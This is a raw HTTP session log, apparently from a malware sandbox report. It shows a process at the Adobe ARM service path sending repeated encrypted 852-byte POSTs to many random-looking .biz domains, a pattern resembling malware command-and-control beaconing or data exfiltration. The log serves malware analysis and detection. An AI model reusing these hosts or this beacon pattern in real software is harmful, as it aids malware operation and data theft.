                                                                                                                                                                Nov 28, 2024 12:12:05.069896936 CET852OUTData Raw: 6c 55 cd bd 12 16 af e6 48 03 00 00 35 ea 07 5b 73 21 d0 38 f9 6b 69 a9 46 bd 91 58 19 67 1c 4c ff 5b c6 e3 3b a5 21 b6 61 da 1a b7 54 e8 9c ea 2e 3f e6 0c 39 23 9b 61 44 bc f2 b1 ab 4f 14 08 71 46 8b 38 01 77 ec bb 3d 33 76 24 6d 00 e4 ba 0d de
                                                                                                                                                                Data Ascii: lUH5[s!8kiFXgL[;!aT.?9#aDOqF8w=3v$ma/<[('!QL(A~-<*!@kC1omFTSmwn,{N099ovuM&s+Y=(.10_mI,pi(u<q;8EmJ(l
                                                                                                                                                                Nov 28, 2024 12:12:07.188550949 CET412INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Thu, 28 Nov 2024 11:12:06 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: btst=ae9ac7ab12da79f958239291fe67bba1|8.46.123.228|1732792326|1732792326|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                9192.168.2.224917282.112.184.197803320C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Nov 28, 2024 12:12:07.722009897 CET343OUTPOST /m HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Host: lpuegx.biz
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                Content-Length: 852
                                                                                                                                                                Nov 28, 2024 12:12:07.722022057 CET852OUTData Raw: 40 1a 74 a1 9d 8e bb 29 48 03 00 00 26 92 a2 d3 9b 0f 2f a9 80 7a de d1 08 94 17 8a 81 d3 7e 09 8e 6a b8 60 36 ed 67 a1 21 2c b5 f8 74 ec 33 dc 9c 8a de 73 f4 4f f6 2b d0 40 3f 42 82 56 ee 47 4a 1d 08 f7 b2 77 cd dc 1e 1d fb 86 87 fc 4b ba ce 00
                                                                                                                                                                Data Ascii: @t)H&/z~j`6g!,t3sO+@?BVGJwKMW("0)Qx8W*QATEOi457Xcc@r*GJ$|QlnZWc|(Z}Yh2r@}|zi$>-$,WN7%R~


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                10192.168.2.224917382.112.184.197803320C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Nov 28, 2024 12:12:29.792757034 CET348OUTPOST /prfudb HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Host: lpuegx.biz
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                Content-Length: 852
                                                                                                                                                                Nov 28, 2024 12:12:29.792785883 CET852OUTData Raw: d5 3d 8d 74 e9 f9 af 4f 48 03 00 00 fb e1 83 6a 60 4b 62 a5 f2 79 2b ef 22 c0 56 af f9 47 70 f4 44 84 c6 fb 08 ad 94 d2 cc 7b 8f dc f8 24 2e 94 81 89 f4 ae 72 32 3c d7 0c 79 22 06 90 7a 00 dd 27 7f 3f 49 55 79 11 06 cd 1b 11 4d 62 7b 32 b2 72 cf
                                                                                                                                                                Data Ascii: =tOHj`Kby+"VGpD{$.r2<y"z'?IUyMb{2r:+\&z%M&at3M3.(e/67"~dCq65vU)x\mFD-"{<UBM[b&Zsvr, [1=<l=_`.Yi


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                11192.168.2.224917482.112.184.197803320C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Nov 28, 2024 12:12:52.176826000 CET350OUTPOST /qmufc HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Host: vjaxhpbji.biz
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                Content-Length: 852
                                                                                                                                                                Nov 28, 2024 12:12:52.177009106 CET852OUTData Raw: 64 fe 9b 72 18 18 ef d7 48 03 00 00 56 94 70 a8 9a c2 b6 f3 41 4f ad f1 83 de 27 3e 46 ae ea 8f 06 91 6e c3 d2 49 db 35 2c 8d cb 7a e4 48 91 0c 61 1e b0 a1 3a d7 0f 2a c6 6f 6b ba 20 61 7f 1f 60 ce 18 25 c1 d2 44 29 81 9d 7b 8e 3f 24 34 6a 1e 1b
                                                                                                                                                                Data Ascii: drHVpAO'>FnI5,zHa:*ok a`%D){?$4jwmnI\+UW`Qun0ln$|6XABaRI{nm2+U+j{}caOa*x8jz6GHl&l.l"@rt'`[KXI.


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                12192.168.2.224917582.112.184.197803320C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Nov 28, 2024 12:13:14.276232004 CET360OUTPOST /webejpnbfwojkbv HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Host: vjaxhpbji.biz
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                Content-Length: 852
                                                                                                                                                                Nov 28, 2024 12:13:14.276252985 CET852OUTData Raw: 5e b2 f1 30 6c 04 c8 84 48 03 00 00 10 bd 2e 66 e8 2e 24 bc 5b 8b 59 6a 90 47 9c 3e 13 2d 59 94 46 3b d1 ac 27 fd 15 82 2d 8b bb 36 71 b7 37 cb ff 32 1d ba a7 9b db fa c0 01 8b 3c 2d 12 95 5e b3 33 a5 d3 61 be 41 31 21 84 0e 2d 16 f5 12 51 ed f4
                                                                                                                                                                Data Ascii: ^0lH.f.$[YjG>-YF;'-6q72<-^3aA1!-QNCbi2/\lg{`"BZ{@K!:ULMp\5M3_i8'gS`=mB7b#+9NpzfH]\i6W;gZ@0#V(R+}cc'z3


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                13192.168.2.224917647.129.31.212803320C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Nov 28, 2024 12:13:36.522104979 CET344OUTPOST /p HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Host: xlfhhhm.biz
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                Content-Length: 852
                                                                                                                                                                Nov 28, 2024 12:13:36.522145033 CET852OUTData Raw: f0 a4 05 98 29 49 62 db 48 03 00 00 7f 96 be d4 7e 7b 77 76 95 8e 3d 1f 3a f4 ca 11 e3 ae 92 b7 a5 1a 16 60 b1 da 43 c7 1f 9a cb 9c 15 28 e5 c5 49 f2 49 bf 24 5e fd 98 8c 35 eb f5 62 48 e5 7a fa f7 29 bb 7c 15 ce 0f f1 7d 32 34 56 77 cb 8f cb 17
                                                                                                                                                                Data Ascii: )IbH~{wv=:`C(II$^5bHz)|}24VwI0TB*m9gd}hxr7C+tB\-,v;{'fj'm:*7Fm7W'>Z^Dp9+&{e3b#
                                                                                                                                                                Nov 28, 2024 12:13:38.589637041 CET411INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Thu, 28 Nov 2024 11:13:38 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: btst=86e371adcf609664bafea5d950f42ae8|8.46.123.228|1732792418|1732792418|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                14192.168.2.224917713.251.16.150803320C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Nov 28, 2024 12:13:38.898021936 CET346OUTPOST /rkqa HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Host: ifsaia.biz
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                Content-Length: 852
                                                                                                                                                                Nov 28, 2024 12:13:38.898042917 CET852OUTData Raw: 63 22 76 32 82 f9 8f 4e 48 03 00 00 51 98 50 08 c0 f1 75 34 14 a4 5f 21 20 22 76 00 9e 6d 21 0a 86 99 bd 6b 1f 2e 65 44 8b 23 69 85 4e 08 71 eb ce be 6f 16 90 0d 77 98 47 69 06 ca 6f 2f a1 da 84 65 b1 79 86 f9 45 b5 b3 37 4f 14 7d ea a5 d0 cd d1
                                                                                                                                                                Data Ascii: c"v2NHQPu4_! "vm!k.eD#iNqowGio/eyE7O}f!2,| :`KY$RzhxZ7P{bphc+nB!^7BEpL</)CBTn>_Y:Jx_W^.]^*B.
                                                                                                                                                                Nov 28, 2024 12:13:40.919090986 CET410INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Thu, 28 Nov 2024 11:13:40 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: btst=c2ac7ee271b91aae2d8bb2e9ece4b57f|8.46.123.228|1732792420|1732792420|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                15192.168.2.224917844.221.84.105803320C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Nov 28, 2024 12:13:41.697468996 CET350OUTPOST /ovknk HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Host: saytjshyf.biz
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                Content-Length: 852
                                                                                                                                                                Nov 28, 2024 12:13:41.697479010 CET852OUTData Raw: 34 b7 18 ab 7f 4b 41 c2 48 03 00 00 47 fc 7b 69 37 40 59 80 57 cf 6b 04 ac 65 9f 56 84 a6 97 e9 23 50 2b 89 ec 42 26 db 7f b3 19 b9 87 05 24 31 7b 66 3e 6a 2e 9c 3e c7 8a d9 9d 6f e9 cd 0d c1 b0 20 1d df ac bc 06 6c 92 90 39 21 11 88 f4 a8 ba 9f
                                                                                                                                                                Data Ascii: 4KAHG{i7@YWkeV#P+B&$1{f>j.>o l9!i@#Mad>A`%is%eOc9^#1$*$~9-;d {S%iE&~ip(#Zs+-q0z#0kpu#u9%
                                                                                                                                                                Nov 28, 2024 12:13:42.839821100 CET413INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Thu, 28 Nov 2024 11:13:42 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: btst=90782b53ccaab0baae9adc7f4eb2b143|8.46.123.228|1732792422|1732792422|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                16192.168.2.224917918.141.10.107803320C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Nov 28, 2024 12:13:43.118539095 CET345OUTPOST /nm HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Host: vcddkls.biz
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                Content-Length: 852
                                                                                                                                                                Nov 28, 2024 12:13:43.118582010 CET852OUTData Raw: 51 c8 6b dc 27 5f a1 88 48 03 00 00 5d 0f 2d 00 7d e2 a5 63 8e 10 de 76 4c c3 c5 bf a1 cc e5 2d b2 d6 b5 52 2a bc f0 21 a8 1c dd 4c 58 8c fc 5f 17 89 a6 ed 74 e0 4c 45 04 ff 4d 8a 5b 5d d2 a3 99 dd 5b 26 1c 68 8a ad 32 92 ba 88 c9 ac 16 94 25 1d
                                                                                                                                                                Data Ascii: Qk'_H]-}cvL-R*!LX_tLEM[][&h2%wTW^%<P!pKx{{"ggOaP_oB>j-x5l%u1-S[=p|8j:SSUi<?bq*3_#x.T0U
                                                                                                                                                                Nov 28, 2024 12:13:45.145045996 CET411INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Thu, 28 Nov 2024 11:13:44 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: btst=be09c1d1cb04e6734479abe9670c4e23|8.46.123.228|1732792424|1732792424|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                17192.168.2.2249180172.234.222.143803320C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Nov 28, 2024 12:13:45.423217058 CET348OUTPOST /hwxehcd HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Host: fwiwk.biz
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                Content-Length: 852
                                                                                                                                                                Nov 28, 2024 12:13:45.423232079 CET852OUTData Raw: c6 5e df ac c7 a2 7b e2 48 03 00 00 ed dd da 6a e4 07 b6 6f 81 c8 e2 be 39 f8 7a 64 b3 b8 79 14 d0 75 30 90 90 89 0f 18 92 26 23 cf 72 e3 84 6d 33 2c 89 88 b0 c9 b3 d8 31 1a 86 ad 78 5b 47 38 c7 9f 66 6a 8c 68 1c d4 38 dd 8f fa f5 66 ef aa bf 16
                                                                                                                                                                Data Ascii: ^{Hjo9zdyu0&#rm3,1x[G8fjh8fANERR/}|,_aCSL[*%kW]<) 4Z6C"^n%}%}5p$Li0kYpyi<pVimYZx9


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                18192.168.2.2249181172.234.222.143803320C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Nov 28, 2024 12:13:46.793849945 CET347OUTPOST /kbtuvb HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Host: fwiwk.biz
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                Content-Length: 852
                                                                                                                                                                Nov 28, 2024 12:13:46.793869019 CET852OUTData Raw: 15 52 f0 09 14 5f e7 0a 48 03 00 00 c1 ba d2 f1 0c ea e7 8f c8 aa 6d a6 b0 39 f9 5d e6 ce a8 86 c2 36 66 af 82 15 bf 2d bd 0e 49 81 e4 8c 33 c4 96 57 df 7a 4e 02 7a 7b de ab c9 57 eb 6e ed ff 5a 80 12 26 16 5b 21 22 f9 ac f4 50 6e 8e 33 08 92 73
                                                                                                                                                                Data Ascii: R_Hm9]6f-I3WzNz{WnZ&[!"Pn3scPKSM,}j\"J_j6Ne*p^' >.BSiq?S)xH(w.D+M_R\05]m/qm$8:vpUw90e?R


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                19192.168.2.224918234.246.200.160803320C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Nov 28, 2024 12:13:48.237174988 CET350OUTPOST /ebyryipv HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Host: tbjrpv.biz
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                Content-Length: 852
                                                                                                                                                                Nov 28, 2024 12:13:48.237195015 CET852OUTData Raw: 97 f3 81 25 c4 f4 2d 56 48 03 00 00 1a ee 97 57 ee e1 5c 9f c0 ac 0c 30 34 48 7d 6d b7 ea 3f 3d b0 87 af 6c bf 6e 14 69 11 fb 5b 2b cb 9f b2 94 09 c7 2a 53 d8 d8 bf 14 4d 24 7c 17 e5 a4 35 e3 e1 a1 b2 71 6c cd 01 9f bd 77 c3 77 dd d3 b1 9c 38 84
                                                                                                                                                                Data Ascii: %-VHW\04H}m?=lni[+*SM$|5qlww8ZLtaW3:{A-n{Oo4nJ=??uc=azs=nVn("T=7nK4;nQN?x<U@}Q_JpJ:t:
                                                                                                                                                                Nov 28, 2024 12:13:49.618149042 CET410INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Thu, 28 Nov 2024 11:13:49 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: btst=03e6de31d47407822d4df08d48d636c5|8.46.123.228|1732792429|1732792429|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                20192.168.2.224918318.208.156.248803320C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Nov 28, 2024 12:13:50.369756937 CET348OUTPOST /vhlxvyk HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Host: deoci.biz
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                Content-Length: 852
                                                                                                                                                                Nov 28, 2024 12:13:50.369798899 CET852OUTData Raw: a6 2d f4 75 a0 86 52 68 48 03 00 00 a2 fc de 6d 52 a6 20 ea 15 9d a3 a5 a4 f4 37 e8 82 8f 62 7e 05 54 90 8d e5 3e 41 24 41 c1 4c f2 3c 16 bb 66 52 d5 dd 32 39 3c 28 63 0f a6 9c 8d 46 0f fa d3 17 3b e5 e8 3f 75 f0 0e 6d 84 12 4a 86 fc d6 76 5b f9
                                                                                                                                                                Data Ascii: -uRhHmR 7b~T>A$AL<fR29<(cF;?umJv[d9{m$'4e&4CToiEu,Kd{Bq- <\Uz;'Z9l4(y1iS1bo%VOuDmzdycH[anb4Rt
                                                                                                                                                                Nov 28, 2024 12:13:51.464062929 CET409INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Thu, 28 Nov 2024 11:13:51 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: btst=22d8f4e2538382d40c618aef6bf6eed2|8.46.123.228|1732792431|1732792431|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                21192.168.2.2249184208.100.26.245803320C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Nov 28, 2024 12:13:51.828934908 CET357OUTPOST /aphnqtgnwfpgg HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Host: gytujflc.biz
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                Content-Length: 852
                                                                                                                                                                Nov 28, 2024 12:13:51.829282045 CET852OUTData Raw: 5c 95 08 87 f9 87 1f c0 48 03 00 00 a1 4f 10 a6 d0 2a d2 3a 52 6d a0 1c fd e3 ba b3 a4 08 39 f2 1e 88 18 08 56 45 40 2e f6 a8 f0 78 07 fb 89 26 22 b1 73 cb 0f a7 6e 82 55 3b e2 70 c5 ea 70 cc 64 76 e2 eb e2 cf 11 e3 4c 36 6e ad b8 f9 cc 4e 0c e2
                                                                                                                                                                Data Ascii: \HO*:Rm9VE@.x&"snU;ppdvL6nN)fRWkt:N.BZz(I :#*?Sx1ZN!CPJRC5jMRX%{(]XZ(mk}%@#<mp4,C(CYw8FU5RNN
                                                                                                                                                                Nov 28, 2024 12:13:52.952058077 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                Date: Thu, 28 Nov 2024 11:13:52 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Content-Length: 580
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                Nov 28, 2024 12:13:53.367996931 CET352OUTPOST /cmjndgqt HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Host: gytujflc.biz
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                Content-Length: 852
